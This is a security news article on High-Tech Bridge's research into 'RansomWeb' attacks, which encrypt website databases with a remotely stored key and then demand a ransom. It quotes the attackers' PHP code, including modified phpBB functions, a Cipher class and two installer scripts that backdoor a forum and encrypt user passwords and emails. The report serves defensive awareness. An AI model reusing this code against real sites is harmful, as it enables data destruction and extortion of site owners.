Researchers from High-Tech Bridge have released research on cyber criminals are encrypting website databases and holding them for ransom with “RansomWeb”

More and more people become victims of ransomware, a malware that encrypts your data and demands money to decrypt them. A new trend on the market shows that cybercriminals will now target your website as well to get a ransom payment from you.

In December 2014, High-Tech Bridge security experts discovered a very interesting case of a financial company website compromise: the website was out of service displaying a database error, while the website owner got an email asking for a ransom to “decrypt the database”. The web application in question was pretty simple and small, but very important to the company’s business – the company could not afford to suspend it, neither to announce its compromise. Careful investigation that by High-Tech bridge revealed the following:

  • The web application was compromised six months ago, several server scripts were modified to encrypt data before inserting it into the database, and to decrypt after getting data from the database. A sort of “on-fly” patching invisible to web application users.
  • Only the most critical fields of the database tables were encrypted (probably not to impact web application performance much). All previously existing database records were encrypted accordingly.
  • The Encryption key was stored on a remote web server accessible only via HTTPS (probably to avoid key interception by various traffic monitoring systems).
  • During six months, hackers were silently waiting, while backups were being overwritten by the recent versions of the database.
  • On day X, hackers removed the key from the remote server. The Database became unusable, the website went out of service, and hackers demanded a ransom for the encryption key.

The researchers stated that they were sure that it was an individual example of a sophisticated APT targeting a specific company, however last week they faced another similar case. One of their customers, an SMB, was blackmailed after his… phpBB forum went out of order. The forum was used as a main platform for customer support, and therefore was important for the customer.

It was the latest phpBB 3.1.2 released on the 25th of November 2014. No user could login (including forum moderators and admins). The forum was online, however all functions that require forum user to be authenticated didn’t work. Our thorough investigation revealed that forum engine was patched in such a way that users’ passwords and emails were encrypted “on-fly” between the web application and the database.

The following files were modified:
1. File “factory.php” has its “sql_fetchrow()” function modified in such a manner that the result of SQL query “$result = $this->get_driver()->sql_fetchrow($query_id);” in array “result” will have decrypted values of “user_password” and “user_email” table fields:
$result[‘user_password’] = $cipher->decrypt($result[‘user_password’]);
$result[‘user_email’] = $cipher->decrypt($result[‘user_email’]);

2. File “functions_user.php” has a modified version of “user_add” function to add encryption:
$sql_ary = array(
‘username_clean’ => $username_clean,
‘user_password’ => (isset($user_row[‘user_password’]))?
‘user_email’=> $cipher->encrypt(strtolower($user_row[‘user_email’])),
‘user_email_hash’=> phpbb_email_hash($user_row[‘user_email’]),
‘group_id’ => $user_row[‘group_id’],
‘user_type’ => $user_row[‘user_type’],

3. File “cp_activate.php” has a modified version of function “main()”:
$sql_ary = array(
‘user_actkey’ => ”,
‘user_password’ => $cipher->encrypt($user_row[‘user_newpasswd’]),
‘user_newpasswd’ => ”,
‘user_login_attempts’ => 0,

4. File “ucp_profile.php” has a modified version of function “main()”:
if (sizeof($sql_ary))
$sql_ary[‘user_email’] = $cipher->encrypt($sql_ary[‘user_email’]);
$sql_ary[‘user_password’] = $cipher->encrypt($sql_ary[‘user_password’]);
$sql = ‘UPDATE ‘ . USERS_TABLE . ‘
SET ‘ . $db->sql_build_array(‘UPDATE’, $sql_ary) . ‘
WHERE user_id = ‘ . $user->data[‘user_id’];

5. File “config.php” had the following modification:
class Cipher {
private $securekey, $iv;
function __construct($textkey) {
$this->securekey = hash(‘sha256’,$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
$cipher=new Cipher($key);

Moreover, the researchers found two backdoor installation scripts left by hackers on the server that permit to backdoor any phpBB forum with just a couple of clicks. The first installer patches “config.php” file to add “Cipher” class that decrypts and encrypts the data with PHP “mcrypt_encrypt()” function storing the encryption key on a remote server:

$file = ‘../config.php’;
$txt = “\n”.’class Cipher {
private $securekey, $iv;
function __construct($textkey) {
$this->securekey = hash(\’sha256\’,$textkey,TRUE);
$this->iv = mcrypt_create_iv(32);
function encrypt($input) {
return base64_encode(mcrypt_encrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, $input, MCRYPT_MODE_ECB, $this->iv));
function decrypt($input) {
return trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,
$this->securekey, base64_decode($input), MCRYPT_MODE_ECB, $this->iv));
$cipher=new Cipher($key);’.”\n”;
if( FALSE !== file_put_contents($file, $txt, FILE_APPEND | LOCK_EX)){
echo “DONE!”;

And the second installer parses all existing phpBB users to encrypt their emails and passwords, and replaces the above-mentioned phpBB files with backdoored copies:
define(‘IN_PHPBB’, true);
$phpbb_root_path = (defined(‘PHPBB_ROOT_PATH’)) ? PHPBB_ROOT_PATH : ‘../’;
$phpEx = substr(strrchr(__FILE__, ‘.’), 1);
include($phpbb_root_path . ‘common.’ . $phpEx);
include($phpbb_root_path . ‘includes/functions_display.’ . $phpEx);
$sql = ‘SELECT user_id, user_password, user_email FROM ‘ . USERS_TABLE;
$result = $db->sql_query($sql);
while ($row = $db->sql_fetchrow($result))
$sql2 = ‘UPDATE ‘ . USERS_TABLE . ‘
user_password = “‘.$cipher->encrypt($row[‘user_password’]).'”,
user_email = “‘.$cipher->encrypt($row[‘user_email’]).'”
WHERE user_id = ‘.$row[‘user_id’];
$result2 = $db->sql_query($sql2);
echo “SQL UPDATED!<br>”;
copy(‘factory.php’, ‘../phpbb/db/driver/factory.php’);
copy(‘functions_user.php’, ‘../includes/functions_user.php’);
copy(‘ucp_activate.php’, ‘../includes/ucp/ucp_activate.php’);
copy(‘ucp_profile.php’, ‘../includes/ucp/ucp_profile.php’);

Attackers waited for two months and then just removed the key from the remote server. The High-Tech Bridge researchers later discovered that phpBB was compromised via stolen FTP password.
For the moment no antivirus software detects even the installers as a known malware:
“step1.php” file
“step2.php” file

Following the wage of Ransomware attacks, the researchers named this hacking technique “RansomWeb”.

  • Let’s try to make a brief analysis of RansomWeb attacks:
  • Potential Opportunities of RansomWeb:
  • Differently from DDoS attacks they can have everlasting impact on web application availability.
  • May be used not only for blackmailing but for long-term website destruction.
  • Backups cannot help a lot, as the database will be backuped in encrypted mode, while the encryption key is stored remotely and will not be backuped.
  • Almost impossible to recover from the attack without paying the ransom, many victims won’t have a choice but to pay hackers.
  • Hosting companies are not ready for this new challenge, and probably won’t be able to help their customers.

The researchers have also identified the Potential Weaknesses of “RansomWeb” which are given below :

  • Can be easily detected by a file integrity monitor (however, very few companies do file integrity monitoring for web applications that may change every day).
  • Pretty difficult to encrypt entire database without damaging web application functionality and/or speed (nevertheless, even one DB field that is unrecoverable may ruin a web application).
  • May be detected pretty quickly when used on regularly-updated web application.

Resource : High-Tech Bridge


Please enter your comment!
Please enter your name here